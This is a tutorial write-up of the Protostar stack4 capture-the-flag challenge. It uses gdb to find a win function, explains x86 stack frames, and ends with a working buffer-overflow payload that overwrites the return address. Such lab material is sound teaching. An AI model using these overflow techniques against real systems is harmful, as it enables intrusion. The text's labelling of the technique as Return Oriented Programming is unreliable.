Practical Reverse Engineering Tutorials Part 2: Protostar Stack4
Table of Contents
About the challenge#
In this article, we’ll go through the Protostar stack4 challenge. This would be a bit similar to the stack0 challenge that we already tackled earlier, but it will think about an interesting way to get alternate code to execute instead of just modifying data.
Pre-requisite: Make sure you’ve completed the Part 1 of the Practical Reverse Engineering Tutorials series. It’d also be great if you can try stack1-stack3 challenges on your own as they are similar to stack0.
Recon#
Assuming you’ve done the setup as needed for Part 1 of this series, we straight away jump to run the challenge to see what we are after.
user@protostar:/opt/protostar/bin$ ./stack4
ABCD
user@protostar:/opt/protostar/bin$
So, we see that the program asks for some user input. When we input ‘ABCD’, nothing happens. That’s a bummer. We need to move to the static analysis to map out our next actions. Remember, it might be easier to look at the source code of the challenge (and it will also not give much away) but we’ll still try to avoid source code as much as possible to give more exercise to our brains.
Static Analysis#
We first run our staple strings
on the program to list interesting text data.
user@protostar:/opt/protostar/bin$ strings stack4
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
gets
puts
__libc_start_main
GLIBC_2.0
PTRh
[^_]
code flow successfully changed
user@protostar:/opt/protostar/bin$
We see a potentially useful string code flow successfully changed
straight away. I’d wager a guess that we’ve to get our currently dumb program to emit this string somehow. Let’s see what is the condition under which this string is being printed. So we bring out gdb like last time and check the disassembled code of main function.
user@protostar:/opt/protostar/bin$ gdb stack4
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/stack4...done.
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
0x08048408 <main+0>: push ebp
0x08048409 <main+1>: mov ebp,esp
0x0804840b <main+3>: and esp,0xfffffff0
0x0804840e <main+6>: sub esp,0x50
0x08048411 <main+9>: lea eax,[esp+0x10]
0x08048415 <main+13>: mov DWORD PTR [esp],eax
0x08048418 <main+16>: call 0x804830c <gets@plt>
0x0804841d <main+21>: leave
0x0804841e <main+22>: ret
End of assembler dump.
(gdb)
That’s interesting. So there’s no way main can print the string we’re after because there’s no print/puts call in here. Interestingly, main makes only one function call to gets
to get user input and there’s no other function being called at all. This would mean that the string is being printed from somewhere else and our challenge is to get that code executed. We know from the previous challenge we solved that to print this string, the program would need to pass a pointer to it as a parameter to a output function (like puts
). So to find that where this string is getting printed from, we’ve to first the address where this string is located and then search for reference to it.
You may know that there are various sections in an executable file. Generally, the executable portion is part of a section called .text
and literal strings are part of a section called .rodata
. So, our technique here would be to:
- Get the section addresses (Using
maintenance info sections
gdb command) - Search for the string’s address in .rodata section (using
find <section_start_address> <section_end_address> <string>
gdb command) - Search for a reference to the string’s address in .text section (using
find <section_start_address> <section_end_address> <string_address>
gdb command)
This is shown below:
(gdb) maintenance info sections
Exec file:
`/opt/protostar/bin/stack4', file type elf32-i386.
0x8048114->0x8048127 at 0x00000114: .interp ALLOC LOAD READONLY DATA HAS_CONTENTS
0x8048128->0x8048148 at 0x00000128: .note.ABI-tag ALLOC LOAD READONLY DATA HAS_CONTENTS
0x8048148->0x804816c at 0x00000148: .note.gnu.build-id ALLOC LOAD READONLY DATA HAS_CONTENTS
0x804816c->0x8048198 at 0x0000016c: .hash ALLOC LOAD READONLY DATA HAS_CONTENTS
0x8048198->0x80481b8 at 0x00000198: .gnu.hash ALLOC LOAD READONLY DATA HAS_CONTENTS
0x80481b8->0x8048218 at 0x000001b8: .dynsym ALLOC LOAD READONLY DATA HAS_CONTENTS
0x8048218->0x8048267 at 0x00000218: .dynstr ALLOC LOAD READONLY DATA HAS_CONTENTS
0x8048268->0x8048274 at 0x00000268: .gnu.version ALLOC LOAD READONLY DATA HAS_CONTENTS
0x8048274->0x8048294 at 0x00000274: .gnu.version_r ALLOC LOAD READONLY DATA HAS_CONTENTS
0x8048294->0x804829c at 0x00000294: .rel.dyn ALLOC LOAD READONLY DATA HAS_CONTENTS
0x804829c->0x80482bc at 0x0000029c: .rel.plt ALLOC LOAD READONLY DATA HAS_CO---Type <return> to continue, or q <return> to quit---
NTENTS
0x80482bc->0x80482ec at 0x000002bc: .init ALLOC LOAD READONLY CODE HAS_CONTENTS
0x80482ec->0x804833c at 0x000002ec: .plt ALLOC LOAD READONLY CODE HAS_CONTENTS
0x8048340->0x80484bc at 0x00000340: .text ALLOC LOAD READONLY CODE HAS_CONTENTS
0x80484bc->0x80484d8 at 0x000004bc: .fini ALLOC LOAD READONLY CODE HAS_CONTENTS
0x80484d8->0x80484ff at 0x000004d8: .rodata ALLOC LOAD READONLY DATA HAS_CONTENTS
0x8048500->0x8048504 at 0x00000500: .eh_frame ALLOC LOAD READONLY DATA HAS_CONTENTS
0x8049504->0x804950c at 0x00000504: .ctors ALLOC LOAD DATA HAS_CONTENTS
0x804950c->0x8049514 at 0x0000050c: .dtors ALLOC LOAD DATA HAS_CONTENTS
0x8049514->0x8049518 at 0x00000514: .jcr ALLOC LOAD DATA HAS_CONTENTS
0x8049518->0x80495e8 at 0x00000518: .dynamic ALLOC LOAD DATA HAS_CONTENTS
0x80495e8->0x80495ec at 0x000005e8: .got ALLOC LOAD DATA HAS_CONTENTS
0x80495ec->0x8049608 at 0x000005ec: .got.plt ALLOC LOAD DATA HAS_CONTENTS
0x8049608->0x8049610 at 0x00000608: .data ALLOC LOAD DATA HAS_CONTENTS
0x8049610->0x8049618 at 0x00000610: .bss ALLOC
0x0000->0x0ad4 at 0x00000610: .stab READONLY HAS_CONTENTS
0x0000->0x3bd2 at 0x000010e4: .stabstr READONLY HAS_CONTENTS
---Type <return> to continue, or q <return> to quit---
0x0000->0x0039 at 0x00004cb6: .comment READONLY HAS_CONTENTS
(gdb) find 0x80484d8,0x80484ff,"code flow successfully changed"
0x80484e0
1 pattern found.
(gdb) x/s 0x80484e0
0x80484e0: "code flow successfully changed"
(gdb) find 0x8048340, 0x80484bc, 0x80484e0
0x80483fd <win+9>
1 pattern found.
(gdb) x/3i 0x80483fd
0x80483fd <win+9>: loopne 0x8048383 <__do_global_dtors_aux+19>
0x80483ff <win+11>: add al,0x8
0x8048401 <win+13>: call 0x804832c <puts@plt>
(gdb)
Thus we figure that the string is being called as part of a function called win
as gdb shows. We can confirm this by disassembling win
and this will also give us its address that we need to direct our code execution to.
(gdb) disassemble win
Dump of assembler code for function win:
0x080483f4 <win+0>: push ebp
0x080483f5 <win+1>: mov ebp,esp
0x080483f7 <win+3>: sub esp,0x18
0x080483fa <win+6>: mov DWORD PTR [esp],0x80484e0
0x08048401 <win+13>: call 0x804832c <puts@plt>
0x08048406 <win+18>: leave
0x08048407 <win+19>: ret
End of assembler dump.
(gdb)
So, we need to make our program start executing at 0x80483f4 (Entry point of function win
) somehow.
A primer about X86 stack frames#
Before continuing further, we will have to learn a bit about how program control works through stack frames. A stack frame is a region on the stack particular to a single function being executed in the call flow and represents its execution environment. If the same function is called many times, each instance of calling that function will have its own stack frame on the stack. A stack frame typically consists of:
- Parameters passed to the function
- Return address (Code location to jump to after the function is complete)
- Pointer to the previous (Calling function’s) stack frame’s base
- Local variables
Let’s see with the help of a small example how this works.
Sample Code#
int foo(int a)
{
int x = 2;
int y = 3;
x = a + x;
return x;
}
int main()
{
int a = 0;
int b = 1;
foo(a);
}
This will compile to the following assembly code
foo:
push ebp
mov ebp,esp
sub esp,0x10
mov DWORD PTR [ebp-0x8],0x2
mov DWORD PTR [ebp-0x4],0x3
mov eax,DWORD PTR [ebp+0x8]
add DWORD PTR [ebp-0x8],eax
mov eax,DWORD PTR [ebp-0x8]
leave
ret
main:
push ebp
mov ebp,esp
sub esp,0x14
mov DWORD PTR [ebp-0x8],0x0
mov DWORD PTR [ebp-0x4],0x1
mov eax,DWORD PTR [ebp-0x8]
mov DWORD PTR [esp],eax
call 0x80483ed <foo>
leave
ret
Stack frame#
Important registers#
The x86 registers that one would be most interested in while understanding stack frames are:
- esp: Stack Pointer. Points to (Holds address of) the current top of the stack
- ebp: Base Pointer. Points to (Holds address of) the base of the current stack frame
- eip: Instruction Pointer. Points to (Holds address of) the next instruction to be executed in the program
Calling Convention / Function Parameters#
In the x86 calling convention, the parameters being passed to a function and the return address are pushed onto the stack before calling it. This can be seen in the below instruction.
mov DWORD PTR [esp],eax
call 0x80483ed <foo>
Here, the mov
instruction is pushing the parameter ‘5’ onto the stack.
The call
instruction is equivalent of pushing eip + 2
onto the stack and then jumping to the called function’s address. eip + 2
here points to the address of the instruction that should be executed next after returning from the called function.
Function Prologue / Entry Sequence#
At the very beginning of a function, the first work done is to save the calling function’s base pointer (ebp) onto the stack and then move the current function’s base pointer to point towards calling function’s top. This can be seen in these instructions:
foo:
push ebp
mov ebp,esp
Local Variables#
Then, space is created on the stack for holding any local variables.
sub esp,0x10
Exit Sequence#
Finally, after the function has executed, it returns by restoring the calling function’s base pointer and then popping the next value (return address) from stack into the eip.
leave
ret
Here, leave
is equivalent of pop ebp
to restore ebp value. ret
is equivalent of pop eip
to start executing the next instruction after the function call.
What we need to do#
From the above analysis of the stack frame, we now know that:
- Program flow is controlled through eip register
- On returning from a called function, eip register is updated with a value (return address) from the stack
- If we can somehow overflow a local variable on stack to modify the return address accurately, we can control the program execution.
- Note that similar to the function
foo
, even the functionmain
has its own stack frame and returns back to “something” after completing its execution. This “something” is the c library runtime against which the compiler linked the program. So we can even try to change execution path by modifying this return address.
Gotchas#
In some explanations, you may see espmain/StackFramemain in the figure above should also include the parameter being passed to foo. However, I’ve excluded it here for the sake of avoiding confusion of overlapping stack frames.
Dynamic Analysis#
Armed with our static analysis so far, we start our dynamic analysis. So, fire up gdb. We know that main
code is like below:
0x08048408 <main+0>: push ebp
0x08048409 <main+1>: mov ebp,esp
0x0804840b <main+3>: and esp,0xfffffff0
0x0804840e <main+6>: sub esp,0x50
0x08048411 <main+9>: lea eax,[esp+0x10]
0x08048415 <main+13>: mov DWORD PTR [esp],eax
0x08048418 <main+16>: call 0x804830c <gets@plt>
0x0804841d <main+21>: leave
0x0804841e <main+22>: ret
End of assembler dump.
We set breakpoints at few locations like below:
(gdb) b *0x08048408
Breakpoint 1 at 0x8048408: file stack4/stack4.c, line 12.
(gdb) b *0x08048411
Breakpoint 2 at 0x8048411: file stack4/stack4.c, line 15.
(gdb) b *0x08048418
Breakpoint 3 at 0x8048418: file stack4/stack4.c, line 15.
(gdb) b *0x0804841d
Breakpoint 4 at 0x804841d: file stack4/stack4.c, line 16.
(gdb) b *0x0804841e
Breakpoint 5 at 0x804841e: file stack4/stack4.c, line 16.
Now, we run the program till the first couple of breakpoints and analyze the registers/stack.
(gdb) r
Starting program: /opt/protostar/bin/stack4
Breakpoint 1, main (argc=1, argv=0xbffff864) at stack4/stack4.c:12
12 stack4/stack4.c: No such file or directory.
in stack4/stack4.c
(gdb) info r
eax 0xbffff864 -1073743772
ecx 0xb0a7a13f -1331191489
edx 0x1 1
ebx 0xb7fd7ff4 -1208123404
esp 0xbffff7bc 0xbffff7bc
ebp 0xbffff838 0xbffff838
esi 0x0 0
edi 0x0 0
eip 0x8048408 0x8048408 <main>
eflags 0x200246 [ PF ZF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) c
Continuing.
Breakpoint 2, main (argc=1, argv=0xbffff864) at stack4/stack4.c:15
15 in stack4/stack4.c
(gdb) info r
eax 0xbffff864 -1073743772
ecx 0xb0a7a13f -1331191489
edx 0x1 1
ebx 0xb7fd7ff4 -1208123404
esp 0xbffff760 0xbffff760
ebp 0xbffff7b8 0xbffff7b8
esi 0x0 0
edi 0x0 0
eip 0x8048411 0x8048411 <main+9>
eflags 0x200286 [ PF SF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) x/24x $esp
0xbffff760: 0xb7fd7ff4 0xb7ec6165 0xbffff778 0xb7eada75
0xbffff770: 0xb7fd7ff4 0x080495ec 0xbffff788 0x080482e8
0xbffff780: 0xb7ff1040 0x080495ec 0xbffff7b8 0x08048449
0xbffff790: 0xb7fd8304 0xb7fd7ff4 0x08048430 0xbffff7b8
0xbffff7a0: 0xb7ec6365 0xb7ff1040 0x0804843b 0xb7fd7ff4
0xbffff7b0: 0x08048430 0x00000000 0xbffff838 0xb7eadc76
(gdb) x/4x $ebp
0xbffff7b8: 0xbffff838 0xb7eadc76 0x00000001 0xbffff864
(gdb)
We can see that c runtime (or whatever it is that called the main function even if don’t want to get ourselves into what that is) has the base pointer (ebp) as 0xbffff838 and this is preserved at 0xbffff7b8. Then, main updates the current stack pointer (esp) as the new ebp of main. After that, main aligns its esp to 16 byte width, thus wasting 8 bytes and then reserves a further 0x50 (80) bytes for its stack. After all these operations, the salient characteristics of main’s stack frame are as below:
- Current stack top (esp) is 0xbffff760
- Current base pointer (ebp) is 0xbffff7b8
- Main’s calling function’s ebp is 0xbffff838 and preserved at 0xbffff7b8
- Main’s calling function’s return address is saved one word before the ebp (as we know as part of the call instruction of calling program). Thus return address is 0xb7eadc76 as we can see at location 0xbffff7bc (previous_ebp + 0x4 = 0xbffff7b8 + 0x4). This address
0xbffff7bc
is the one that we want to overwrite with our intended address ofwin
function so as to execute that instead of main’s caller function.
Now, run till the next breakpoint.
(gdb) c
Continuing.
Breakpoint 3, 0x08048418 in main (argc=1, argv=0xbffff864)
at stack4/stack4.c:15
15 in stack4/stack4.c
(gdb) x $esp
0xbffff760: 0xbffff770
(gdb)
So we see that the pointer address for storing the input string from gets
is located at 0xbffff770 (since the argument to gets
is the buffer address and it is passed at the top of the stack as we know from previous section). We can see how far away this is from the address we want to overwrite by subtracting it:
0xbffff7bc - 0xbffff770 = 0x4C (or 76 bytes)
So, we know that the difference between our intended location and input buffer address is 76 bytes, so if we input 80 bytes, the 77th-80th bytes will overwrite the return address. We can now go for the win (pun intended) already but let’s continue further to our rest of the breakpoints to confirm our theory.
(gdb) c
Continuing.
12345678901234567890123456789012345678901234567890123456789012345678901234567890
Breakpoint 4, main (argc=0, argv=0xbffff864) at stack4/stack4.c:16
16 in stack4/stack4.c
(gdb) x/24x $esp
0xbffff760: 0xbffff770 0xb7ec6165 0xbffff778 0xb7eada75
0xbffff770: 0x34333231 0x38373635 0x32313039 0x36353433
0xbffff780: 0x30393837 0x34333231 0x38373635 0x32313039
0xbffff790: 0x36353433 0x30393837 0x34333231 0x38373635
0xbffff7a0: 0x32313039 0x36353433 0x30393837 0x34333231
0xbffff7b0: 0x38373635 0x32313039 0x36353433 0x30393837
(gdb) info r $ebp
ebp 0xbffff7b8 0xbffff7b8
(gdb) c
Continuing.
Breakpoint 5, 0x0804841e in main (argc=Cannot access memory at address 0x3635343b
) at stack4/stack4.c:16
16 in stack4/stack4.c
(gdb) info r $ebp
ebp 0x36353433 0x36353433
(gdb)
We continue and enter an 80 byte long pattern and can see the repeated pattern visible on the stack and the last 4 bytes 7890
(0x30393837 in little endian hex format) have overwritten the address. We also see that if we stop after the leave
instruction, the value 0x36353433 from address 0xbffff7b8 has been popped back into ebp.
Now, we find out the address of the win
function and use its address as the last 4 bytes in an 80 byte input to the program to crack it.
(gdb) x win
0x80483f4 <win>: 0x83e58955
(gdb) quit
user@protostar:/opt/protostar/bin$ python -c 'print "A"*76+"\xf4\x83\x04\x08"' | ./stack4
code flow successfully changed
Segmentation fault
user@protostar:/opt/protostar/bin$
References / Lessons Learnt#
In this article, we learnt:
- Getting information about different sections of a program in gdb
- Searching for values in a section of the program through gdb
- Extending our knowledge of stack/buffer overflow to override program execution by manipulating return address (Also known as ROP or Return Oriented Programming attack)
- About stack frames and esp/ebp/eip registers
You can refer to the below links for reading up more about some of the things discussed above. If you have any queries or suggestions, please leave a comment here or ping me @shantanugoel